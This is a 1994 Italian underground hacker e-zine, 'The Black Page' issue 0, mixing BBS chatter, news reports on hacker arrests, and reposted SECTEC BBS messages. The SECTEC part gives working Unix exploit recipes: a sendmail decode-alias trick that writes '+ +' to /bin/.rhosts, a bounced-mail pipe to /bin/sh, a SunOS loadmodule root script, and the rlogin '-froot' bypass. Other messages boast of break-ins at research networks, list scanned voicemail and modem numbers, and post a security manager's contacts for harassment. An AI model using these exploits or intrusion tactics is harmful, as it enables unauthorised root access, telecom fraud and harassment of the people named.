"NO". Il mittente del primo messaggio, legge quel messaggio e si rende conto che tra le sue capacita' umane manca quella di saper abbinare quella vaga risposta ad un suo precedente messaggio. In quel momento succede di tutto, litiga con la madre, manda a quel paese il fratello e non telefona neppure alla ragazza. Momenti di estrema confuzione lo tormentano: "a che messaggio, a che argomento sara' abbinato quel bruttissimo no?", pensa il povero utente, che, tutto sudato, cerca tra la polvere del suo cervello ma senza darsi una risposta. La faccenda si conclude, tagliando il copione, con un ulteriore messaggio di Mr. Sillabe, il quale, sorpreso di non averla ricevuta prima, sollecita una risposta al suo tenebroso messaggio. Il povero utente ormai distrutto dalla situazione puo' decidere, tra le seguenti, una soluzione: 1) Mandare un'altro messaggio in cpe a quell'utente, pregandolo di ricondurlo sull'argomento dimenticato, con la probabilita' di ricascare nel tenebroso giro e di riperdere la testa. 2) Far finta di nulla, e fregarsene come faccio Io... scrivendo in Sfogatoio quando il problema raggiunge un numero preoccupante di casi. 3) Scrivere all'utente, pregandolo di non farsi piu' vivo nell propria cpe, accusandolo pesantemente di aver provocato gravi danni al ns. equilibrio mentale e di aver fatto dimenticare la parola pace nella propria famiglia. 4) Mandare una risposta a caso, magari con qualche frase ironica, ma del tutto insignificante, prendendo esempio da Etrusco. 5) Contattare il SYSOP e fare escludere, trviare completamente l'utente dalla messaggeria. Morale della favola: ci vuole un po' di chiarezza nella CPE. Se io mando un messaggio ad un utente con una domanda che esige anche soltanto un "Si" o un "No", la relativa risposta deve contenere un mininimo di richiamo all' argomento del messaggio a cui si risponde. La cpe non e' una casella riservata al dialogo tra DUE persone, ma al dialogo con PIU' persone, quindi questa routine va eseguita SEMPRE. Se farlo vi stanca enormemente, bevete un po' di Enervit o Gatorade o fatevi una macro! --------------------------------------- Msg#: 5266 Date: 16 Jul 94 10:53 From: Mastro Ciliegia Read: Yes Replied: No To: All Mark: Subj: arte e orrorism Trafiletto allegato all'articolo "COsi' colpisce l'orrorista": NOSTRI ATTORI DEI MACELLI Arte o pessimo gusto? Il critico Barilli vuol scoprire le strategie. Ci sono precedenti. E SE FOSSE veramente arte? "E' ancora prematuro parlarne", risponde Renato Ba- rilli, attento studioso delle nuove tendenze artistiche. "Per il momento - prsegue - sembrerebbero solo scherzi di pessimo gusto, senza niente di esteti- co ne' di anti-estetico. Ma dobbiamo attendere per capire se i ritrovamenti di frattaglie sono casuali o rispondono a una strategia". Quel che e' certo e' che Bologna e l'Emilia Ro- magna sono tradizionalmente al centro di eventi artistici che comportano - letteralmente - spargimento di sangue e interiora. Proprio grazie a Barilli, infatti, si consumo' a Bologna, in Santa Lucia, nel giugno 1977, uno degli e- venti piu' importanti della body-art degli anni settanta, all'interno della celebre "Settimana della performance" organizzata dalla Galleria d'arte moder- na. L'artista era Herman Nitsch, che rovescio' sui corpi nudi di alcuni volon- tari quintali di sangue e budella animali. Un evento-choc che fece conoscere un'intera area geografico-artistica di cui venne data una documentazione "in- quietante" in una mostra sull'arte austriaca a Bologna pochi anni fa. Anche in ambito teatrale sono emerse tensioni in questo senso, a cominciare dal contro- verso spettacolo, ambientato in un macello durante l'uccisione di un cavallo, realizzato dai Magazzini Criminali al festival di Santarcangelo di dieci anni fa. per continuare con le opere della cesenate Societas Raffaello Sanzio, il cui ultimo spettacolo, "Lucifero", porta in scena quarti di bue appesi agli uncini e teste mozzate di agnelli. -!- ! Origin: European Counter Network - Milano - 39-2-2840243 (45:1917/1) SEEN-BY: 1/1 4/1 5/1 9/1 10/2 30/1 999/999 1000/1 4 1100/1 1200/1 5 1400/1 SEEN-BY: 1500/1 1600/1 1800/1 1900/1 1917/1 2 3 11 2000/1 --------------------------------------- Mitt. Piergiorgio 'Il Cretino' (ANSA) BO EMILIA ROMAGNA NORD ITALIA EUROPA TIT SCOPERTO INTRUSO IN RETE TELEMATICA MONDIALE IND CRONACA TXT ZCZC0330/RMB R CRO S0B S41 QBXJ SCOPERTO INTRUSO IN RETE TELEMATICA MONDIALE (ANSA) - BOLOGNA, 26 MAG - Era riuscito ad inserirsi nella principale ''autostrada elettronica'' (definizione del presidente Usa Clinton), la Internet, fondata dal Pentagono nel '60, rivolta prevalentemente alla ricerca scientifica e accademica, e ora collegata a 15 milioni di computer nel mondo, di cui 20.000 in Italia. Uno dei primi ''intrusori'' italiani (all' estero sono accaduti diversi casi) e' stato identificato da un pool guidato dal sostituto procuratore di Bologna Riccardo Rossi e che comprendeva gli investigatori dei carabinieri e gli esperti del Politecnico di Milano e dell' Universita' di Parma. E' una ''matricola'' della Facolta' di informatica della Statale di Milano, di cui non sono state fornite le generalita' ne' dal magistrato, ne' dall' Universita' di Bologna, che ha diffuso un comunicato. L' illecita intrusione nella superprotetta rete elettronica (che consente lavori integrati di elaborazione dati altrimenti impensabili) e' stata ravvisata quasi subito, ai primi di aprile, dal Dipartimento di Matematica di Bologna (il primo a connettersi alla rete nell' 87) e dal Cirfid (centro di ricerca in filosofia del diritto e informatica giuridica), sempre nel capoluogo emiliano. Il Rettore dell' Ateneo, Fabio Roversi Monaco, ha presentato denuncia il 14 aprile e gia' il 1 maggio era stato identificato il dell' intrusore: da quel momento sono scattate le intercettazioni telefoniche sulla sua utenza. Queste hanno accertato gli inserimenti via ''modem'' e le conversazioni con altri ''informaticofili'' in cui dava conto di aver scoperto la password per entrare nel sistema. Ora rischia cinque anni di carcere per ''accesso abusivo'' e fino a un anno e 10 milioni di multa per la diffusione a terzi del codice di accesso. Convocato dai carabinieri di Bologna, ha detto di essersi molto ''annoiato, perche' i programmi erano tutti uguali''. Ma intanto aveva scoperto il 70% delle parole d' ordine degli utenti Cirfid, in meno di un mese di lavoro o, forse, di gioco. L' intrusore infatti non ha fatto danni (avrebbe potuto cancellare o correggere interi file) e forse si e' impadronito solo per caso del codice di un utente regolare per poi qualificarsi come ''Root'', che e' il nome effettivo dell' amministratore del sistema, con il quale ha cercato di scardinare un' altra trentina di sistemi informatici italiani. Ma gli investigatori ritengono che possa esserci lo zampino del movimento degli Hackers, che combatte come antidemocratica la concentrazione di dati politici economici e militari e tende a scardinare i sistemi per rendere pubbliche le informazioni. In Italia gli Hackers, secondo quanto riferito in una conferenza stampa, si riconoscerebbero in una rivista, punto di riferimento dei ''pirati'' elettronici italiani. (ANSA). Spero serva di lezione.... --------------------------------------- Mitt XXXXXXXXXX Data 25/01/94 10:35:32 Msg_XXX 1/1 Object: NVI SKAN Questo e' lo scan del segmento 1678745xx 500 VMBX 507 VMBX 509 VMBX 518 ? 4 DIGIT PROGRAM 534-535 VMBX 537 VMBX 541 MODEM 9600 542 VMBX 550 MODEM 2400 551 VMBX 555 MODEM 9600 556 VMBX 585 VMBX --------------------------------------- Mitt Piergiorgio Data 02/01/94 13:10:20 Msg_XXX Object: ANSA...volevate sapere di Marz 93012105150 DOCUMENT= 1 OF 4 NUMBER OF LINES = 69 DATRAS = 930121 SCELTA = GEN IDENTIFICAZIONE__ 930121 05150 21 GEN 1993 LUO ROMA RM LAZIO CENTRO ITALIA EUROPA TIT ''INTRUSI NEL COMPUTER'': COME AGISCONO GLI HACKER IND CRONACA TXT ZCZC394/0B U CRO S0B R16 QBXB ''INTRUSI NEL COMPUTER'': COME AGISCONO GLI HACKER (ANSA) - ROMA, 21 GEN - Veri e propri pirati dell' informatica, gli hacker sono specializzati nel violare la sicurezza di computer e programmi per penetrare al loro interno, impadronendosi dei dati o danneggiandoli (vedi Ansa 073/0B e segg). I loro obiettivi sono banche dati, informazioni riservate di aziende ed enti pubblici o privati. A volte si impadroniscono direttamente delle informazioni, in altri casi si limitano a scoprire i codici segreti per entrare nei computer per venderli o scambiarli. Questi codici sono in realta' le informazioni piu' preziose perche' non sono soltanto la chiave per violare la ''privacy'' del computer, ma la porta per accedere alla rete informatica alla quale sono collegati i computer e iniziare un viaggio telematico, potenzialmente in tutto il mondo, a spese delle aziende danneggiate. In Italia gli hacker sono attivi da anni, tanto da essere fra i piu' abili del mondo, ma scoprirli e' difficilissimo. Finora il caso piu' eclatante e' stato, due anni fa, la truffa ai danni del servizio Videotel della Sip. Con l'operazione portata a termine oggi dalla Criminalpol a Roma, Milano e Napoli la vita dei pirati informatici diventa invece piu' difficile. I circa 40 hacker inquisiti sono stati ''pedinati via cavo'' giorno e notte per tre mesi, grazie a un sistema unico in Europa messo a punto dall'Ufficio della Criminalpol per i crimini informatici. Dopo avere individuato il primo hacker, quello che ha disattivato la banca dati sui trapianti del Policlinico di Roma, la Criminalpol ha preferito non bloccarlo subito, ma seguirlo lungo le reti informatiche per risalire ai suoi ''colleghi''. E' riuscita a farlo dando all'hacker l'illusione di penetrare nella banca dati del Policlinico, mentre veniva indirizzato dalla polizia in una copia del sistema. In questo modo l'hacker continuava ad agire senza fare danni, mentre la polizia ne seguiva le mosse in un computer gemello di quello usato dall'hacker, collegato alla rete telefonica, che sul terminale della polizia mostrava tutte le operazioni del computer pirata. ''Solo un metodo cosi' sofisticato poteva smascherare hacker tanto abili'', ha commentato il direttore centrale dell'Istituto per la sicurezza informatica (Istinform), Fulvio Berghella, che ha collaborato con la Criminalpol. ''Sono stati molto furbi - ha aggiunto - perche' riuscivano a penetrare indisturbati nei computer 'mascherandosi' in modo da sfuggire ad ogni controllo''. Piu' abili del protagonista del film ''Wargame'', gli hacker viaggiavano sulle reti informatiche di tutto il mondo, dall'Estremo Oriente al Nord America, usando programmi in grado di ''mimetizzarsi'' con il sistema dei computer nei quali penetravano, tanto da diventare praticamente invisibili ai controlli. (ANSA). --------------------------------------- Mitt XXX Data 22/07/94 16:01:01 Msg_XXXX Object: non esageriamo le cazzate via e-mail si scrivono ovunque, ma li dentro gente con le palle c'e' eccome... tramite i tanti dell'enea e' possibile accedere direttamente al cern e pare all'acceleratore di particelle in remoto, se e' vero che sono tutti collegati sarebbe un bel colpo avere accesso a tutti i sincrotroni della terra, fino a poco tempo fa mezzo pianeta aveva accesso ai vax del cern ma pare nessuno sia riuscito a cavarne nulla, in giro ho anche letto che sta per partire una spedizione in antartide (enea) ed e' stato creato un network custom per tenere i contatti.. il net e' collegato a inet via SAT ho gia' tutte le info.. per ora i collegamenti sono instabili ma presto sara' ok(o forse lo e' gia').. sara' il amssimo hackerare la.. di cose da farece ne sono parecchie, peccatoche la maggior partedella gente pensa che l'hacking sia la ricerca dinuovi pad X fare i fighi su qsd.. ah la diffusione di E-mail privata e' un reato motlo serio, spiegatemi ildivertimento a leggere i messy privati di una coppia.. e come mettersi a spiare uan ragazza che si spoglia con ilbinocolo.... penoso Area XXX Mitt XXXXX/XX Data 23/07/94 01:55:51 Msg_XXXX 1/3 Object:enea ke vuoi accessi x l'enea? kuanti? ripeto, x me all'enea sono TUTTI degli emeriti koglioni, l;trimenti mi avrebbero gia bekkato da 3 anni e invece sto sempre li'? kuindi di cert furbi non lo sono. poi ke facciano i links del kazzo ke vogliono, non me ne fotte nulla, io sfondo x sfodare una societa e basta, non me ne frega un kazzo delle particelle di biotomi dell'uccello dell'operatore. Non ti diverti a kallare ksd dal botswana te? pekkato io si. senno si skannan sempre gli stessi paesi le stesse societa' e ci si rompe proprio il kazzo kredimi. il cern via decnet e' ovviamente linkato all'enea xke anke l'enea sta in decnet globale, non tutto ma molti vax si. komunkue il cern e' linkato a tutto, non e' il kaso di usare gli accounst dei lamers ke giravano sul cern e ke girano da sempre x avere accesso ai diski del cern stesso. I links piu grandi kon l'italia, a kaunto ho visto, il cern li ha kon l'Infn, altri granmdissimi koglioni. Una kosa: nessuno skannando x.25/inet/decnet ha mai bekkato il vax di kontrollo del gran sasso? cioe... di un koso (non rikorod kosa) ke han messo sotto o dentreo il gran sasso, un vax 4000 mi pare.. xke io ho un account full privs la, ma mi son xso l'indir decnet e inet, kuello x.25 ce l'ho xo' e in Na al momento. grazie Mitt Xxx Data 23/07/94 14:44:34 Msg_XXXX 1/1 Object: ENEA li stimo e continuero' a stimarli per quello che fanno, io non sono maistato buttato fuori da niente se e' per questo ma non e' perche' glioperatorisono coglioni, semplicemente minascondo bene.. infn confermo, addirittura su un sunos mi sono cuccato il filesistem montato in remoto diun server del cern, robetta da iente comunque.. il net del gran sasso e' infn, ti ricordi il nome del vax? ildomain e' gs.infn.it a memoria, ci sono entrato ultimamente X il cisco, sofndabile ma niente x.25. se entri non cancellarmi i log --------------------------------------- Corriere della Sera 03 Agosto 1994 --------------------------------------------------------------------------- Denunciati 5 giovani: Hanno fatto pagare salate bollette Sip a una societa' di comunicazioni I PIRATI TRADITI DA SAMANTHA Il collegamento con la linea erotica smaschera i truffatori col computer -------------------------------------------------------------------------- A cura di Ice MC Da quasi un anno la bolletta Sip per i collegamenti via computer sembrava impazzita. c'erano delle spese per i servizi erotici di Samantha, una di quelle messagerie su cui gli appassionati si scatenano con le fantasie piu' turpi. Poi sono arrivati i costi per la consultazione delle banche dati di anziende aerospaziali e uffici federali americani. Dalla corte di cassazione di roma, e le cifre astronomiche per i collegamenti con la rete telefonica cinese. Tutto questo era a capo di una societa' specializzata in telecomnucazioni. Per un po' la ditta ha pagato: fino a 150 milioni a bimestre. Ma tre mesi fa i manager si sono decisi a presentare una denuncia alla Digos ed e' comincita la prima indagine computerizzata mai messa a segno a Milano. Gli investigatori non hanno fatto pedinamenti, ma hanno trascorso intere settimane al loro computer per intercettare le connessioni illegali. Alla fine cinque giovani pirati informatici sono stati denunciati per frode informatica: due reati entrati a far parte del codice penale soltanto l'anno scorso. Dei cinque, tre sono di Milano: Fabio P., 25 anni, autista di camion con la grande passione per i computer, Maurizio O., 21, studente di Scienze politiche, Luca R., 22, anche lui studente universitario. Gli altri due invece sono Massimiliano L., 25 anni, tecnico in un'azienda a Roma dove abita, e Andrea S., 17 anni, studente, di Siracusa. I cinque non si conoscevano. Da una banca dati pirata avevano saputo il codcie segreto della societa' di telecommunicazioni milanese che, per le sue necessita' di lavoro, era collegata al servizio Itapac, la rete informatica della Sip. Il codice segreto e' il numero di identificazione con cui la Sip riconosce l'abbonato e gli addebita gli scatti. E proprio avendo quel numero, con le loro tastiere, i cinque pirati si sono inseriti nella rete Itapac. Per due mesi gli agenti, diretti dal vicequestore Dino Finolli, hanno seguito sui loo video le loro scorribande informatiche: un lavoro simile alle intercettazioni telefoniche. I tre ragazzi di Milano e il collega di Siracusa sono stati subito irintracciati, perche' utilizzavano la linea telefonica di casa. Piu' difficile invece risalire al tecnico di Roma, che si serviva del computer dell'azienda dove lavora. I poliziotti dovevano identificarlo tra decine di dipendenti. Ma non hanno fatto fatica: Massimiliano L. si collegava quasi sempre alla messageria erotica di Samantha. Una ragazza della Digos lo ha convinto, via computer, a rivelare il numero di telefono promettendogli qualcosa di vermente sexi. Gli investigatori hanno cosi' rintracciato l'azienda. E verso le 11 dell'altra mattina una squadra, inviata a Roma, lo ha sorpreso con il computer ancora acceso. Fabrizio Gatti [N.d.R.: Allora.. come al solito la Digos fa' cilecca.. o per lo meno.. becca solo i + Lame..hehe ... In sostanza.. volete fare sesso al vdt?.. beh..fatevi dare il suo di numero.. =:-P Ice MC ] [N.d.R.: Voci di corridoio parlano di altri 20 fermi nella zona di Milano ma prendetela colle pinze, potrebbero essere solo stronzate. Del resto l'avete letto alcune "stronzate" piu' sopra :) Sul prossimo numero di TBP intervisteremo, se ci riuscira' di contattarli, i diretti interessati :O ] --------------------------------------- SOMETHING FROM SECTEC BBS ------------------------- Msg #1018 Wednesday, June 22, 1994 03:15 CET From: Nexus.6%bbs@sectec.greenie.muc.de (Nexus 6) To: All%bbs@sectec.greenie.muc.de (All) Subject: lamers! I left mesages on this bbs about a system, a military systen and here it is from cert ... so there is someone here that is really a lamer and he works for CERT so keep your eyes reallo open! here you are the txt From bin Mon Jun 13 01:38 EDT 1994Received: from tymix.tymnet.com by hp.hq.dla.mil (16.6/1.34) id AA02086; Mon, 13 Jun 94 01:38:50 -0400Received: by tymix.Tymnet.COM (4.1/SMI-4.1) id AA25206; Sun, 12 Jun 94 22:40:48 PDTReceived: from druid by tymix.Tymnet.COM (in.smtpd); 12 Jun 94 22:40:48 PDTReceived: by druid.Tymnet.COM (4.1/SMI-4.1) id AA25144; Sun, 12 Jun 94 22:39:32 PDTDate: Sun, 12 Jun 94 22:39:32 PDTFrom: ddrew@Tymnet.COM (Dale Drew)Message-Id: <9406130539.AA25144@druid.Tymnet.COM>To: cert@cert.org, ddrew@Tymnet.COM, nsd@druid.Tymnet.COM, postmaster@hp.hq.dla.mil, root@hp.hq.dla.milSubject: Possible IncidentTo whom it may concern:My name is Dale Drew, and I am the manager of the Data Systems Security Department here at MCI.During a recent data investigation, our department identified a computermessage left on a Bulletin Board System, left by a computer "hacker".The computer hacker left a message to all members of the BBS that includedan account name and password that could apparently be used to access your computer system. The hacker also indicates that he has access to other accounts to other systems at your site, but did not provide additionaldetails to the extent of that apparent access.The system IP number is: 131.62.0.2, and the account name is "fho0337". Apassword was left as well, but I will not transmitt it over e-mail, nor theactual BBS message itself, unless otherwise permitted by your site to do so.We do not know the validity of the BBS message, I am merely passing it alongas an FYI. Additional information about this incident can be obtained bycontacting me directly. Information about the poster of the message is alsoavailable.Best regards, "SUCCESS THROUGH TEAMWORK" ========================================================================= Dale Drew MCI Telecommunications Manager Data Systems Integrity Voice: (408) 922-6526 Internet: ddrew@Tymnet.COM Fax : (408) 922-8870 MCIMAIL: Dale_Drew/644-3335 # Msg #1025 Friday, June 24, 1994 11:46 CET From: The.Aky%bbs@sectec.greenie.muc.de (The Aky) Subject: Re: lamers! >so should we keep our H/P-info by ourselves? If some asshole is really doing >that shit above, he could get our ass' burned.... hmmm.. or he could get HIS ass burned.. hmm look this >> Data Systems Integrity Voice: (408) 922-6526 >> Internet: ddrew@Tymnet.COM Fax : (408) 922-8870 >> MCIMAIL: Dale_Drew/644-3335 # call these numbers :P Msg #1035 Monday, July 4, 1994 01:28 CET From: Ceasar.Thecat%bbs@sectec.greenie.muc.de (Ceasar Thecat) To: All%bbs@sectec.greenie.muc.de (All) Subject: WHY PAY FULL PRICE FOR A LONG DISTANCE CALL FROM EUROPE ? If you have to call home or business in US, Canada or any other country (outside EC) stop paying the full price. From now on you can benefit of the US cheap prices with the Call-back service. You just have to call their computer in Houston (this is free), it calls you back and gives you a dial tone. This works for voice as well as for faxes and modem communications. NO MINIMUM, you pay for what you really use NO ENTRY FEES, they set the service frely for you. MONTHLY DETAILED BILL in US dollars, pay with your credit card possible destinations list and detailed prices available on request contact Nicolas Laurance (33-1) 40.61.03.51 --- Hey do you smell what I am smelling? he.. Equip yourself with an Omega.exe and go and break that shit. It is tool-free from Europe . America online universal tool free number, should be breakable. Call the guy and find the number. Ceasar Msg #201 Saturday, June 25, 1994 09:19 CET From: Dark.Side%bbs@sectec.greenie.muc.de (Dark Side) To: All%bbs@sectec.greenie.muc.de (All) Subject: inet sites hello... dunno if it was asked, but here are some interesting sites... (ftp) uranus.ifi.unit.no/pub/Version_1.6_prerel_1/Demo_filer/ 192.31.181.1 128.184.1.1 /UniOn-students/incoming/" " most are pc/amiga/mac/etc... check me if you need more... post others if you got them! Subject: Re: IRC some irc servers: irc.mit.edu polaris.ctr.columbia.edu csz.bu.edu irc-2.mit.edu and a buncha others. Msg #210 Thursday, July 7, 1994 02:13 CET From: The.Aky%bbs@sectec.greenie.muc.de (The Aky) Subject: Re: IRC yeah... harp.aix.calpoly.edu copper.ucs.indiana.edu poe.acc.Virginia.EDU irc.iastate.edu irc.technion.ac.il hermes.oc.com Boston.MA.US.UnderNet.ORG ...etc... i am thinking to make a list of most known servers... post them :) Aky Msg #1005 Sunday, June 12, 1994 17:11 CET From: Elmar.Bartel%bbs@sectec.greenie.muc.de (Elmar Bartel) Subject: Re: SMTP BUG Techno.Music%bbs@sectec.greenie.muc.de (Techno Music) writes: > about the smtp bug of the sun os unix,to discover if this bug is patched i > ive the instruction vrfy decode. > when the system give this message: user unknown > the bug is patched,but is possible that the system answer the user exist and > the bug is patched too? > this couse i found a system that say the user exist but i can't use the > bug... The decode doesn't have anything to do with a smtp bug. It is simply an alias which pipes mail to uudecode. Use a 'from: bin' and make up a uuencoded file '/bin/.rhosts' which contains one single line '+ +'. Well, you guess what this does... :) 'from: bin' and 'to: decode' will uudecode your message to /bin/.rhosts et voila. There we go. I don't have to tell you what to do with an '+ +' .rhosts, do I? :) The smtp bug is about something completely different. When bouncing mail all but the latest versions of sendmail will set a flag, which forces the mail to be sent, even if this meant mailing it to a program. Thus, use something like 'from: /usr/ucb/tail|/bin/sh', 'to: bin'. Create a header which will cause the mail to bounce, e. g. 'Return-Receipt-To: |nowhere'. Then make the last ten (including the line with the '.') a shell script, e. g. make the last lines of your mail body something along the lines of ---- cut here ---- #!/bin/sh echo HELLO THERE >/tmp/test # # # These comments pad the message to a length of ten lines # # # # ---- cut here ---- What happens when your mail is being delivered? It will bounce, and it will be returned to '/usr/ucb/tail|/bin/sh'. 'tail' keeps only the last ten lines of your mail and pipes it to /bin/sh. Get the point? :) -Elmar Msg #94 Saturday, June 11, 1994 02:17 CET From: Davex.Davex%bbs@sectec.greenie.muc.de (Davex Davex) To: All%bbs@sectec.greenie.muc.de (All) Subject: newz Some Quotes from Mobile & Cellular.. UK trade Mag. Re-chipping Ban. ~~~~~~~~~~~~~~~ BABT approval on new TACS cellphones will in future include a clause which invalidates the approval if a phone's ESN is altered. The move follows industry-wide discussions between BABT and Oftel, the networks, manufacturers, dealers and the FCS Cellular Service Providers Group. Peter Edwards of the FCS group said: "ESN re-chipping continues to fuel the rise in mobile phone theft and is costing our members millions of pounds every year in stolen airtime and time-consuming administration. The public should now realise that if the serial numbers (ESNs) are changed they cannot be connected to the network and are therefore valueless." **************************** Tell me about it!! Does this mean more fones to phreak with?? Australia ~~~~~~~~~ GSM went live in Australia on May 20th after two months of trials. The Optus GSM network, which will be available in all Australian capitals by Christmas, uses infrastructure by Nortel Matra Cellular. **************************** More newz as it comez in....DaveX Msg #1099 Thursday, August 11, 1994 14:44 CET From: Jerome.X%bbs@sectec.greenie.muc.de (Jerome X) Subject: Re: Linux Nexus.6%bbs@sectec.greenie.muc.de (Nexus 6) writes: > Doen anybody know some bugs on linux?! the -froot bug maybe..... at the loginprompt just enter -f root or -froot or sumthing ..... heard of it, but I never found a site with this bug... the same bugcould be abug in AIX machines J-X Msg #1101 Thursday, August 11, 1994 23:24 CET From: Elmar.Bartel%bbs@sectec.greenie.muc.de (Elmar Bartel) Subject: Re: loadmodule Maxwell.Benneth%bbs@sectec.greenie.muc.de (Maxwell Benneth) writes: > Anyone played with /usr/openwin/loadmodule on 4.1.3.1U ? > Maxwell Benneth! Still around. :) loadmodule executes scripts with a uid of 0. cannot remember where those are located. try 'loadmodule x x'. it will complain that it cannot find the kernel module 'x'. then replace the first 'x' with a valid device, i use the 'evq' device. the second 'x' stands for a shell script. thus loadmodule will complain it cannot find the script and give you the full path. then use the corresponding 'evq' script. 'cat' it and you'll see that there is a 'chmod' in there (used to chmod the device node created by mknod) which doesn't have a full path like '/bin/chmod'. since this script is executed with root privileges just write your own chmod and set your path to '.' > Doen anybody know some bugs on linux?! try a 'rlogin [machine] -l -froot'. in many versions the username '-froot' will be passed to the login program by the daemon and login will accept this to be the '-f' flag with the argument 'root'. only '-f root' should be accepted here. also works on many AIXes. how embarassing. :) -Elmar Msg #1114 Monday, August 15, 1994 02:43 CET From: Phantom.Lord%bbs@sectec.greenie.muc.de (Phantom Lord) To: All%bbs@sectec.greenie.muc.de (All) Subject: loadmodule Here's script that exploits loadmodule on SunOSes .... set path = ( . $path ) cat > ld << EOF /bin/sh EOF chmod a+x ld loadmodule sd.o evqload Msg #1125 Tuesday, August 23, 1994 21:47 CET From: Bayern.Power%bbs@sectec.greenie.muc.de (Bayern Power) Subject: Re: sam Techno.Music%bbs@sectec.greenie.muc.de (Techno Music) writes: > Cyber.1%bbs@sectec.greenie.muc.de (Cyber 1) writes: > > > The italian SAMANTHA chat system has been busted by italian police. > > bye > samantha didn't was an hacking system...so why did they bust it? FidoNet boards are legal as well and have been busted anyway - in Italy, logic doesn't count! [N.d.R. AAAAHAHAHAHAHAHAHHHAHAHAHHAHAHAHAH SCSI ha sempre ragione :) ] Msg #233 Sunday, August 28, 1994 18:51 CET From: The.Aky%bbs@sectec.greenie.muc.de (The Aky) Subject: Re: IRC >I need a workin dialin with an IRC-account ...! Yes , only for IRC.. iftp irc client from cs.bu.edu and there you go... s Msg #234 Monday, August 29, 1994 08:48 CET From: Massimo.Baga%bbs@sectec.greenie.muc.de (Massimo Baga) Subject: Re: IRC Ganja.Man%bbs@sectec.greenie.muc.de (Ganja Man) writes: u should check for +1 515 945 7000. it provides u free telnet access and IRC . Cheers, Massimo Msg #29 Monday, August 8, 1994 21:18 CET From: Speed.Demon%bbs@sectec.greenie.muc.de (Speed Demon) To: All%bbs@sectec.greenie.muc.de (All) Subject: fsp site Decent FSP site. Physical Plant #5 128.206.29.11 12321 Pc and Mac wares ============================================================================ Beh, fine delle stronzate. Speriamo che vi siano piaciute !!! +++ATH j)(/œkjk=# OK ----------------------------------------------------------------- The Black Page - Numero 0, Settembre 1994 - THE END COMMIATO ======== Bene, questa e' proprio la fine. Speriamo che questa strana rivista vi sia piaciuta. E' solo un tentativo di tirare fuori qualcosa di buono, dal no- stro paese, che finora sembra solo popolato da stronzi :) vabbe' va, in ogni caso prendetela per com'e', e NON ROMPETECI I COGLIONI dicendo cazzate, che e' lamer, che fa schifo, perche' a noi cosi' va bene. E POI, CAZZO !!! Ho cercato per MESI dei collaboratori, e voi, SI, VOI, STRONZACCI, mi avete detto "ma se scrivo solo io allora non se ne fa niente" oppure "ma io non voglio sputtanare quello che so" e cazzate del genere. SI, CAZZATE, perche' basta un po' di fantasia per tirare fuori cose interessanti. Questo numero, almeno credo, non ha niente di illecito al suo interno. Contie- ne dati prelevati da BBS e CHAT di vario tipo, chiunque puo' andare li' e prenderseli. Ma rappresenta piu' che altro un nostro ESPERIMENTO, per vedere se dopo aver letto ste cazzate qualcuno si decidera' ad aiutarci. Molti avrebbero prima di tutto voluto vedere di che si trattava per poi decidere se collaborare o no. Bene, adesso l'avete visto. Questa magazine e' aperta a ogni tipo di cosa che riguardi il ns mondo telematico. Quindi, fatevi sotto !!! Se avete intenzione di collaborare, di mandarci dei vs articoli, di farci delle domande, di esprimere le vs opinioni sulla rivista, o per darci dei suggerimenti, o anche semplicemente per INSULTARCI, beh, scrivete agli in- dirizzi EMAIL sotto-riportati. FATELO !!! E SUBITO !!! :) ============================================================================ H THE BLACK PAGE - Numero 0 - Settembre 1994 - INDIRIZZI EMAIL VALIDI : H ============================================================================ H H \ / T H H Internet : ay146@freenet.hsc.colorado.edu H ___\__/\---/--- F E H H H _____\/\-/----- I L H H Cybernet : 65:1200/1 DECODER BBS H ______//------- G E H H Scrivere a "Dupree's Paradise" H _____//\-\----- H C H H H / \ T O H H QSD : Mailbox "DUPREES PARADISE" H / \ M H H H H H Videotel : Arkimede *52181# H TELECOM H H NUA 2551604400 H SE LA CONOSCI H H Lasciare CPE all'user "DUPREE'S" H LA EVITI H H H H ============================================================================ THE BLACK PAGE - In questo numero hanno collaborato : ----------------------------------------------------- Dupree's Paradise - Redattore capo Ice MC - Redattore quasi capo anche lui :) Ace - Corrispondente dagli Esteri :) Hitman Italy - The K00l Unix guy ;) Si ringrazia tacitamente Sxs per la "Mucca che caga" di IRC ----------------------------------------------------------- Si ringraziano i seguenti esseri, reali o virtuali : ---------------------------------------------------- Ace Hitman Italy I Vax Brothers Lo staff di Arkimede SevenUp e tutti quanti su SECTEC BBS Black Jack Agora' Telematica Gomma, Luc Pac e tutto lo staff di Decoder BBS Lo staff di One Man Crew Per qualsiasi messaggio utilizzate la seguente chiave PGP 2.3a : ================================================================ -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3a mQCNAi4ineEAAAEEAKT5tLs4cMmniPjJE1Xv0D0/sbxTKPCY+f60c7px/xXUDObv 47fnFscT7lOZ7TeCJVo8m7qfj6HqiqSLuRMTNeAEcTUvUYoa7I+mNceL3rVgkqid qf3RP0av7AFCfICSnzzA/KD3M73I0SBeAt3Mple6EeJ0C7sA+o2626Mw2H/BAAUR tNdEdXByZWUncyBQYXJhZGlzZSA8UVNEIE1ieCA6ICJEVVBSRUVTIFBBUkFESVNF Ij4gICAgIDxGaWRvbmV0IDI6MzMxLzM2OT4gICAgICAgIDxheTE0NkBGcmVlbmV0 LkhzYy5Db2xvcmFkby5FZHU+ICAgICAgICAgICAgICAgICAgICAgPEN5YmVybmV0 IDY1OjEyMDAvMT4gICAgICAgPER1cHJlZSdzLlBhcmFkaXNlJWJic0BTZWN0ZWMu R3JlZW5pZS5NdWMuRGU+ICAgICAgICA6KYkAlQIFEC4in4nJtVamMFAlIQEBFu8E AKLEfKdOjF+rV5gBg1/KFQ//CHsfYS4FNd3qvbRx6PEUIy3NJ4+YSpGAsPgxNyGg gVv7QEHHeDlRwgrSkVvM2AaIwYWxZqs2/X09Igy2QowpfTduVppN0mzGyb2/ug5k PyYA/rsriHxmciMjAUjcptv+7WYVx73q7PmbSTUzYjQA =pvb/ -----END PGP PUBLIC KEY BLOCK----- @BEGIN FILE_ID.DIZ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ɼ * Dupree's Paradise * & -IceMC- È» ÇÄÄÄÄÄÄÄÄÄÄpÄrÄeÄsÄeÄnÄtÄsÄÄÄÄÄÄÄÄÄĶ º The First Italian ------------=== º º ===----------- Cyberpunk Magazine º ÇÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĶ ÇÄ The Black Page Ķ º* Issue 00 - September 1994 *º 